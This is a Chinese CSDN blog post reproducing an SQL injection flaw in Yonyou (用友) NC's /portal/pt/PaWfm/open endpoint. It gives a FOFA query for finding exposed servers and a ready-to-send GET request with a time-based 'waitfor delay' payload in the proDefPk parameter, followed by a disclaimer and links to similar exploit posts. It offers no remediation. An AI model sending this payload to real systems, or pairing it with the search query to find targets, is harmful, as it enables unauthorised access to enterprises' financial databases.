【漏洞复现】用友 NC PaWfm SQL注入漏洞

最新推荐文章于 2024-05-20 10:00:15 发布
最新推荐文章于 2024-05-20 10:00:15 发布
阅读量183 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/137708959
版权

0x01 产品简介

用友NC是用友网络科技股份有限公司开发的一款大型企业数字化平台。它主要用于企业的财务核算、成本管理、资金管理、固定资产管理、应收应付管理等方面的工作,致力于帮助企业建立科学的财务管理体系,提高财务核算的准确性和效率。

0x02 漏洞概述

用友NC 存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。

0x03 测绘语句

fofa: app="用友-UFIDA-NC"

0x04 漏洞复现

GET /portal/pt/PaWfm/open?pageId=login&proDefPk=11';waitfor+delay+'0:0:6'-- HTTP/1.1

0x05 影响范围

用友NC

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

从不学安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
用友U8 CRM swfupload 任意文件上传漏洞(XVE-2024-8597)
qq_39894062的博客
04-20 470
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
用友 NC showcontent SQL注入漏洞
qq_39894062的博客
04-21 356
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
漏洞用友NC Cloud-runScript-SQL注入漏洞
Nday_Seeker
03-20 676
用友NC Cloud系统中的runScript接口被发存在SQL注入SQL Injection)安全漏洞。攻击者通过构造恶意的输入数据,能够将非法的SQL命令插入到原本正常的数据库查询语句中,从而绕过授权机制,未经授权地直接访问、修改或删除数据库中的敏感信息。
用友 NC ActionServlet SQL注入漏洞
0xSec
04-09 547
用友NC /service/~iufo/com.ufida.web.action.ActionServlet 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
用友时空KSOA SQL注入漏洞
0xSec
08-13 2368
用友时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
用友NC Cloud runScript SQL注入漏洞
0xSec
03-20 506
用友NCCloud /ncchr/attendScript/internal/runScript接口处存在SQL注入漏洞,未授权的攻击者可以通过此漏洞获取数据库权限,进一步利用可导致服务器失陷。
用友u8-cloud RegisterServlet SQL注入漏洞
fly夏天的博客
12-25 1177
用友U8 cloud是用友推出的企业上云数字化平台,该产品RegisterServlet接口处存在SQL注入漏洞,攻击者可通过该漏洞获取数据库权限。文章了该漏洞并提供了进一步利用的相关方案。并提供了官方的修方案。
用友U8 Cloud SQL注入漏洞
12-06 334
用友U8 Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。
用友GRP-U8 SQL注入漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-26 1501
用友GRP-U8 SQL注入漏洞
用友NC BeanShell远程代码执行
09-07
# 用友NC BeanShell远程代码执行 # CNVD-2021-30167 ## 漏洞描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.[servlet]...
用友NC65安装操作手册(自己编制)
10-13
用友NC65安装操作手册,其他NCC高版本产品一样可以用,适合想自己学习测试的新手顾问,内容包含了如何安装数据库,建立表空间,如何配置数据源等。
用友NC65报表创建步骤-实用
03-16
报表部分:查询语句部分,可以sql,可以表关联后自动创建(必须遵循pk_org , pk_group 每个语义模型中必含集团和组织PK) 语义模型(查询语句)-动态建模平台-报表平台-语义模型-集团 自由报表(展示界面)-动态建模...
用友nc数据字典.xls
02-19
用友nc数据字典.xls
sql去除表中某个字段的空格
最新发布
HelloWorld的专栏
05-20 52
比如表中名字字段,名字之间有空格,需要把空格去除,应该如何写SQL语句实?函数来去除字符串两端的空格,如果需要去除字段中的所有空格,可以使用。以下是一个示例,假设我们有一个名为。的表,并且我们想要去除。在SQL中,可以使用。
Oracle数据库之PL/SQL基本语法(八)
pursue_mony的博客
05-14 114
PL/SQL 是 Oracle 数据库中使用的过程化 SQL 语言扩展,它允许你在 SQL 语句中嵌入控制结构、变量声明、异常处理等。用于在 PL/SQL 块中输出调试信息。为了看到这些信息,你需要在 SQL*Plus 或其他客户端中启用它(例如,使用。PL/SQL 代码通常被组织在块(block)中。一个块包含三个部分:声明部分、执行部分和异常处理部分。包是 PL/SQL 中一种将逻辑、变量、常量、游标、类型、子程序、异常等组合在一起的数据库对象。在 PL/SQL 中,你可以在。部分来处理运行时错误。
SQL——SERVER的建表的基础知识
m0_74012211的博客
05-15 1316
SQL——SERVER的基本建表操作
用友nc反序列化漏洞
12-21
用友NC反序列化漏洞是指用友NC软件存在的一种安全漏洞,攻击者可以利用该漏洞向受害者的系统中注入恶意代码,导致系统遭受攻击。该漏洞的成因主要是由于用友NC软件在反序列化过程中存在安全性缺陷,攻击者可以利用这一点来执行未经授权的代码。 攻击者通常会利用一些常见的反序列化漏洞利用技术,如反序列化注入、反序列化利用链等,来利用用友NC软件的漏洞进行攻击。通过构造恶意的序列化数据,攻击者可以在受害者系统中执行恶意代码,包括但不限于执行任意命令、获取系统权限、窃取敏感信息等行为。 为了防范用友NC反序列化漏洞的攻击,用户和系统管理员可以采取一些措施,如及时安装官方发布的安全补丁、加强系统安全配置、限制用户权限、使用安全的序列化与反序列化机制等。另外,对于已知的漏洞利用技术,用户还可以利用防火墙、入侵检测系统等安全设备进行监测和阻断。 总之,要防范用友NC反序列化漏洞的攻击,需要用户和系统管理员密切关注安全动态,及时采取必要的安全措施来保护系统和数据的安全。同时,用友NC软件的开发者也应及时修这类漏洞,加强软件的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值